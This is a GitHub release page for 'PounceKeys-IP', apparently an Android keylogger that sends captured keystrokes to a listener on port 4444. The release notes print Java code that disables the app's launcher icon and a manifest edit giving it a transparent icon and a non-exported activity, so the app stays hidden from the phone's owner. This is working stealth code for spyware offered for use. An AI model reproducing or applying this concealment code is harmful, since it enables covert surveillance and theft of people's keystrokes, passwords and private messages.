Skip to content

PounceKeys-IP

Compare
Choose a tag to compare
@NullPounce NullPounce released this 06 Mar 04:16
· 55 commits to main since this release
e9f8796

march 16th 2024 new update

default port is 4444 no need to set. the numbers in the names are in relation to the buffer size

added this snippet to end of mainactivity.java

// Hide the launcher icon
		PackageManager p = getPackageManager();
		ComponentName componentName = new ComponentName(this, MainActivity.class);
		p.setComponentEnabledSetting(componentName, PackageManager.COMPONENT_ENABLED_STATE_DISABLED, PackageManager.DONT_KILL_APP);
	}
}

and then updated the manifest like so

<application
		android:allowBackup="true"
		android:icon="@android:color/transparent"
		android:label="@string/app_name"

		android:supportsRtl="true"
		android:theme="@style/AppTheme">
		<activity android:name=".MainActivity"
			android:exported="false">

this gives us our old behavior which makes it not open the app at all on all android versions and hides from the
launcher android 9 and bellow.